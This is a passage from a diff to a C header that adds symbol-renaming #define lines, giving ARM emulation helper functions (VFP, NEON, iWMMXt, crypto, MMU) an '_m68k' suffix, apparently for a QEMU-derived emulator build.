gen_helper_rsqrts_f32_m68k +#define gen_helper_sadd16 gen_helper_sadd16_m68k +#define gen_helper_sadd8 gen_helper_sadd8_m68k +#define gen_helper_saddsubx gen_helper_saddsubx_m68k +#define gen_helper_sar_cc gen_helper_sar_cc_m68k +#define gen_helper_sdiv gen_helper_sdiv_m68k +#define gen_helper_sel_flags gen_helper_sel_flags_m68k +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_m68k +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_m68k +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_m68k +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_m68k +#define gen_helper_set_rmode gen_helper_set_rmode_m68k +#define gen_helper_set_user_reg gen_helper_set_user_reg_m68k +#define gen_helper_shadd16 gen_helper_shadd16_m68k +#define gen_helper_shadd8 gen_helper_shadd8_m68k +#define gen_helper_shaddsubx gen_helper_shaddsubx_m68k +#define gen_helper_shl_cc gen_helper_shl_cc_m68k +#define gen_helper_shr_cc gen_helper_shr_cc_m68k +#define gen_helper_shsub16 gen_helper_shsub16_m68k +#define gen_helper_shsub8 gen_helper_shsub8_m68k +#define gen_helper_shsubaddx gen_helper_shsubaddx_m68k +#define gen_helper_ssat gen_helper_ssat_m68k +#define gen_helper_ssat16 gen_helper_ssat16_m68k +#define gen_helper_ssub16 gen_helper_ssub16_m68k +#define gen_helper_ssub8 gen_helper_ssub8_m68k +#define gen_helper_ssubaddx gen_helper_ssubaddx_m68k +#define gen_helper_sub_saturate gen_helper_sub_saturate_m68k +#define gen_helper_sxtb16 gen_helper_sxtb16_m68k +#define gen_helper_uadd16 gen_helper_uadd16_m68k +#define gen_helper_uadd8 gen_helper_uadd8_m68k +#define gen_helper_uaddsubx gen_helper_uaddsubx_m68k +#define gen_helper_udiv gen_helper_udiv_m68k +#define gen_helper_uhadd16 gen_helper_uhadd16_m68k +#define gen_helper_uhadd8 gen_helper_uhadd8_m68k +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_m68k +#define gen_helper_uhsub16 gen_helper_uhsub16_m68k +#define gen_helper_uhsub8 gen_helper_uhsub8_m68k +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_m68k +#define gen_helper_uqadd16 gen_helper_uqadd16_m68k +#define gen_helper_uqadd8 gen_helper_uqadd8_m68k +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_m68k +#define gen_helper_uqsub16 gen_helper_uqsub16_m68k +#define gen_helper_uqsub8 gen_helper_uqsub8_m68k +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_m68k +#define gen_helper_usad8 gen_helper_usad8_m68k +#define gen_helper_usat gen_helper_usat_m68k +#define gen_helper_usat16 gen_helper_usat16_m68k +#define gen_helper_usub16 gen_helper_usub16_m68k +#define gen_helper_usub8 gen_helper_usub8_m68k +#define gen_helper_usubaddx gen_helper_usubaddx_m68k +#define gen_helper_uxtb16 gen_helper_uxtb16_m68k +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_m68k +#define gen_helper_v7m_msr gen_helper_v7m_msr_m68k +#define gen_helper_vfp_absd gen_helper_vfp_absd_m68k +#define gen_helper_vfp_abss gen_helper_vfp_abss_m68k +#define gen_helper_vfp_addd gen_helper_vfp_addd_m68k +#define gen_helper_vfp_adds gen_helper_vfp_adds_m68k +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_m68k +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_m68k +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_m68k +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_m68k +#define gen_helper_vfp_divd gen_helper_vfp_divd_m68k +#define gen_helper_vfp_divs gen_helper_vfp_divs_m68k +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_m68k +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_m68k +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_m68k +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_m68k +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_m68k +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_m68k +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_m68k +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_m68k +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_m68k +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_m68k +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_m68k +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_m68k +#define gen_helper_vfp_mins gen_helper_vfp_mins_m68k +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_m68k +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_m68k +#define gen_helper_vfp_muld gen_helper_vfp_muld_m68k +#define gen_helper_vfp_muls gen_helper_vfp_muls_m68k +#define gen_helper_vfp_negd gen_helper_vfp_negd_m68k +#define gen_helper_vfp_negs gen_helper_vfp_negs_m68k +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_m68k +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_m68k +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_m68k +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_m68k +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_m68k +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_m68k +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_m68k +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_m68k +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_m68k +#define gen_helper_vfp_subd gen_helper_vfp_subd_m68k +#define gen_helper_vfp_subs gen_helper_vfp_subs_m68k +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_m68k +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_m68k +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_m68k +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_m68k +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_m68k +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_m68k +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_m68k +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_m68k +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_m68k +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_m68k +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_m68k +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_m68k +#define gen_helper_vfp_touid gen_helper_vfp_touid_m68k +#define gen_helper_vfp_touis gen_helper_vfp_touis_m68k +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_m68k +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_m68k +#define gen_helper_vfp_tould gen_helper_vfp_tould_m68k +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_m68k +#define gen_helper_vfp_touls gen_helper_vfp_touls_m68k +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_m68k +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_m68k +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_m68k +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_m68k +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_m68k +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_m68k +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_m68k +#define gen_helper_wfe gen_helper_wfe_m68k +#define gen_helper_wfi gen_helper_wfi_m68k +#define gen_hvc gen_hvc_m68k +#define gen_intermediate_code_internal gen_intermediate_code_internal_m68k +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_m68k +#define gen_iwmmxt_address gen_iwmmxt_address_m68k +#define gen_iwmmxt_shift gen_iwmmxt_shift_m68k +#define gen_jmp gen_jmp_m68k +#define gen_load_and_replicate gen_load_and_replicate_m68k +#define gen_load_exclusive gen_load_exclusive_m68k +#define gen_logic_CC gen_logic_CC_m68k +#define gen_logicq_cc gen_logicq_cc_m68k +#define gen_lookup_tb gen_lookup_tb_m68k +#define gen_mov_F0_vreg gen_mov_F0_vreg_m68k +#define gen_mov_F1_vreg gen_mov_F1_vreg_m68k +#define gen_mov_vreg_F0 gen_mov_vreg_F0_m68k +#define gen_muls_i64_i32 gen_muls_i64_i32_m68k +#define gen_mulu_i64_i32 gen_mulu_i64_i32_m68k +#define gen_mulxy gen_mulxy_m68k +#define gen_neon_add gen_neon_add_m68k +#define gen_neon_addl gen_neon_addl_m68k +#define gen_neon_addl_saturate gen_neon_addl_saturate_m68k +#define gen_neon_bsl gen_neon_bsl_m68k +#define gen_neon_dup_high16 gen_neon_dup_high16_m68k +#define gen_neon_dup_low16 gen_neon_dup_low16_m68k +#define gen_neon_dup_u8 gen_neon_dup_u8_m68k +#define gen_neon_mull gen_neon_mull_m68k +#define gen_neon_narrow gen_neon_narrow_m68k +#define gen_neon_narrow_op gen_neon_narrow_op_m68k +#define gen_neon_narrow_sats gen_neon_narrow_sats_m68k +#define gen_neon_narrow_satu gen_neon_narrow_satu_m68k +#define gen_neon_negl gen_neon_negl_m68k +#define gen_neon_rsb gen_neon_rsb_m68k +#define gen_neon_shift_narrow gen_neon_shift_narrow_m68k +#define gen_neon_subl gen_neon_subl_m68k +#define gen_neon_trn_u16 gen_neon_trn_u16_m68k +#define gen_neon_trn_u8 gen_neon_trn_u8_m68k +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_m68k +#define gen_neon_unzip gen_neon_unzip_m68k +#define gen_neon_widen gen_neon_widen_m68k +#define gen_neon_zip gen_neon_zip_m68k +#define gen_new_label gen_new_label_m68k +#define gen_nop_hint gen_nop_hint_m68k +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_m68k +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_m68k +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_m68k +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_m68k +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_m68k +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_m68k +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_m68k +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_m68k +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_m68k +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_m68k +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_m68k +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_m68k +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_m68k +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_m68k +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_m68k +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_m68k +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_m68k +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_m68k +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_m68k +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_m68k +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_m68k +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_m68k +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_m68k +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_m68k +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_m68k +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_m68k +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_m68k +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_m68k +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_m68k +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_m68k +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_m68k +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_m68k +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_m68k +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_m68k +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_m68k +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_m68k +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_m68k +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_m68k +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_m68k +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_m68k +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_m68k +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_m68k +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_m68k +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_m68k +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_m68k +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_m68k +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_m68k +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_m68k +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_m68k +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_m68k +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_m68k +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_m68k +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_m68k +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_m68k +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_m68k +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_m68k +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_m68k +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_m68k +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_m68k +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_m68k +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_m68k +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_m68k +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_m68k +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_m68k +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_m68k +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_m68k +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_m68k +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_m68k +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_m68k +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_m68k +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_m68k +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_m68k +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_m68k +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_m68k +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_m68k +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_m68k +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_m68k +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_m68k +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_m68k +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_m68k +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_m68k +#define gen_rev16 gen_rev16_m68k +#define gen_revsh gen_revsh_m68k +#define gen_rfe gen_rfe_m68k +#define gen_sar gen_sar_m68k +#define gen_sbc_CC gen_sbc_CC_m68k +#define gen_sbfx gen_sbfx_m68k +#define gen_set_CF_bit31 gen_set_CF_bit31_m68k +#define gen_set_condexec gen_set_condexec_m68k +#define gen_set_cpsr gen_set_cpsr_m68k +#define gen_set_label gen_set_label_m68k +#define gen_set_pc_im gen_set_pc_im_m68k +#define gen_set_psr gen_set_psr_m68k +#define gen_set_psr_im gen_set_psr_im_m68k +#define gen_shl gen_shl_m68k +#define gen_shr gen_shr_m68k +#define gen_smc gen_smc_m68k +#define gen_smul_dual gen_smul_dual_m68k +#define gen_srs gen_srs_m68k +#define gen_ss_advance gen_ss_advance_m68k +#define gen_step_complete_exception gen_step_complete_exception_m68k +#define gen_store_exclusive gen_store_exclusive_m68k +#define gen_storeq_reg gen_storeq_reg_m68k +#define gen_sub_carry gen_sub_carry_m68k +#define gen_sub_CC gen_sub_CC_m68k +#define gen_subq_msw gen_subq_msw_m68k +#define gen_swap_half gen_swap_half_m68k +#define gen_thumb2_data_op gen_thumb2_data_op_m68k +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_m68k +#define gen_ubfx gen_ubfx_m68k +#define gen_vfp_abs gen_vfp_abs_m68k +#define gen_vfp_add gen_vfp_add_m68k +#define gen_vfp_cmp gen_vfp_cmp_m68k +#define gen_vfp_cmpe gen_vfp_cmpe_m68k +#define gen_vfp_div gen_vfp_div_m68k +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_m68k +#define gen_vfp_F1_mul gen_vfp_F1_mul_m68k +#define gen_vfp_F1_neg gen_vfp_F1_neg_m68k +#define gen_vfp_ld gen_vfp_ld_m68k +#define gen_vfp_mrs gen_vfp_mrs_m68k +#define gen_vfp_msr gen_vfp_msr_m68k +#define gen_vfp_mul gen_vfp_mul_m68k +#define gen_vfp_neg gen_vfp_neg_m68k +#define gen_vfp_shto gen_vfp_shto_m68k +#define gen_vfp_sito gen_vfp_sito_m68k +#define gen_vfp_slto gen_vfp_slto_m68k +#define gen_vfp_sqrt gen_vfp_sqrt_m68k +#define gen_vfp_st gen_vfp_st_m68k +#define gen_vfp_sub gen_vfp_sub_m68k +#define gen_vfp_tosh gen_vfp_tosh_m68k +#define gen_vfp_tosi gen_vfp_tosi_m68k +#define gen_vfp_tosiz gen_vfp_tosiz_m68k +#define gen_vfp_tosl gen_vfp_tosl_m68k +#define gen_vfp_touh gen_vfp_touh_m68k +#define gen_vfp_toui gen_vfp_toui_m68k +#define gen_vfp_touiz gen_vfp_touiz_m68k +#define gen_vfp_toul gen_vfp_toul_m68k +#define gen_vfp_uhto gen_vfp_uhto_m68k +#define gen_vfp_uito gen_vfp_uito_m68k +#define gen_vfp_ulto gen_vfp_ulto_m68k +#define get_arm_cp_reginfo get_arm_cp_reginfo_m68k +#define get_clock get_clock_m68k +#define get_clock_realtime get_clock_realtime_m68k +#define get_constraint_priority get_constraint_priority_m68k +#define get_float_exception_flags get_float_exception_flags_m68k +#define get_float_rounding_mode get_float_rounding_mode_m68k +#define get_fpstatus_ptr get_fpstatus_ptr_m68k +#define get_level1_table_address get_level1_table_address_m68k +#define get_mem_index get_mem_index_m68k +#define get_next_param_value get_next_param_value_m68k +#define get_opt_name get_opt_name_m68k +#define get_opt_value get_opt_value_m68k +#define get_page_addr_code get_page_addr_code_m68k +#define get_param_value get_param_value_m68k +#define get_phys_addr get_phys_addr_m68k +#define get_phys_addr_lpae get_phys_addr_lpae_m68k +#define get_phys_addr_mpu get_phys_addr_mpu_m68k +#define get_phys_addr_v5 get_phys_addr_v5_m68k +#define get_phys_addr_v6 get_phys_addr_v6_m68k +#define get_system_memory get_system_memory_m68k +#define get_ticks_per_sec get_ticks_per_sec_m68k +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_m68k +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__m68k +#define gt_cntfrq_access gt_cntfrq_access_m68k +#define gt_cnt_read gt_cnt_read_m68k +#define gt_cnt_reset gt_cnt_reset_m68k +#define gt_counter_access gt_counter_access_m68k +#define gt_ctl_write gt_ctl_write_m68k +#define gt_cval_write gt_cval_write_m68k +#define gt_get_countervalue gt_get_countervalue_m68k +#define gt_pct_access gt_pct_access_m68k +#define gt_ptimer_access gt_ptimer_access_m68k +#define gt_recalc_timer gt_recalc_timer_m68k +#define gt_timer_access gt_timer_access_m68k +#define gt_tval_read gt_tval_read_m68k +#define gt_tval_write gt_tval_write_m68k +#define gt_vct_access gt_vct_access_m68k +#define gt_vtimer_access gt_vtimer_access_m68k +#define guest_phys_blocks_free guest_phys_blocks_free_m68k +#define guest_phys_blocks_init guest_phys_blocks_init_m68k +#define handle_vcvt handle_vcvt_m68k +#define handle_vminmaxnm handle_vminmaxnm_m68k +#define handle_vrint handle_vrint_m68k +#define handle_vsel handle_vsel_m68k +#define has_help_option has_help_option_m68k +#define have_bmi1 have_bmi1_m68k +#define have_bmi2 have_bmi2_m68k +#define hcr_write hcr_write_m68k +#define helper_access_check_cp_reg helper_access_check_cp_reg_m68k +#define helper_add_saturate helper_add_saturate_m68k +#define helper_add_setq helper_add_setq_m68k +#define helper_add_usaturate helper_add_usaturate_m68k +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_m68k +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_m68k +#define helper_be_ldq_mmu helper_be_ldq_mmu_m68k +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_m68k +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_m68k +#define helper_be_ldul_mmu helper_be_ldul_mmu_m68k +#define helper_be_lduw_mmu helper_be_lduw_mmu_m68k +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_m68k +#define helper_be_stl_mmu helper_be_stl_mmu_m68k +#define helper_be_stq_mmu helper_be_stq_mmu_m68k +#define helper_be_stw_mmu helper_be_stw_mmu_m68k +#define helper_clear_pstate_ss helper_clear_pstate_ss_m68k +#define helper_clz_arm helper_clz_arm_m68k +#define helper_cpsr_read helper_cpsr_read_m68k +#define helper_cpsr_write helper_cpsr_write_m68k +#define helper_crc32_arm helper_crc32_arm_m68k +#define helper_crc32c helper_crc32c_m68k +#define helper_crypto_aese helper_crypto_aese_m68k +#define helper_crypto_aesmc helper_crypto_aesmc_m68k +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_m68k +#define helper_crypto_sha1h helper_crypto_sha1h_m68k +#define helper_crypto_sha1su1 helper_crypto_sha1su1_m68k +#define helper_crypto_sha256h helper_crypto_sha256h_m68k +#define helper_crypto_sha256h2 helper_crypto_sha256h2_m68k +#define helper_crypto_sha256su0 helper_crypto_sha256su0_m68k +#define helper_crypto_sha256su1 helper_crypto_sha256su1_m68k +#define helper_dc_zva helper_dc_zva_m68k +#define helper_double_saturate helper_double_saturate_m68k +#define helper_exception_internal helper_exception_internal_m68k +#define helper_exception_return helper_exception_return_m68k +#define helper_exception_with_syndrome helper_exception_with_syndrome_m68k +#define helper_get_cp_reg helper_get_cp_reg_m68k +#define helper_get_cp_reg64 helper_get_cp_reg64_m68k +#define helper_get_r13_banked helper_get_r13_banked_m68k +#define helper_get_user_reg helper_get_user_reg_m68k +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_m68k +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_m68k +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_m68k +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_m68k +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_m68k +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_m68k +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_m68k +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_m68k +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_m68k +#define helper_iwmmxt_addub helper_iwmmxt_addub_m68k +#define helper_iwmmxt_addul helper_iwmmxt_addul_m68k +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_m68k +#define helper_iwmmxt_align helper_iwmmxt_align_m68k +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_m68k +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_m68k +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_m68k +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_m68k +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_m68k +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_m68k +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_m68k +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_m68k +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_m68k +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_m68k +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_m68k +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_m68k +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_m68k +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_m68k +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_m68k +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_m68k +#define helper_iwmmxt_insr helper_iwmmxt_insr_m68k +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_m68k +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_m68k +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_m68k +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_m68k +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_m68k +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_m68k +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_m68k +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_m68k +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_m68k +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_m68k +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_m68k +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_m68k +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_m68k +#define helper_iwmmxt_minub helper_iwmmxt_minub_m68k +#define helper_iwmmxt_minul helper_iwmmxt_minul_m68k +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_m68k +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_m68k +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_m68k +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_m68k +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_m68k +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_m68k +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_m68k +#define 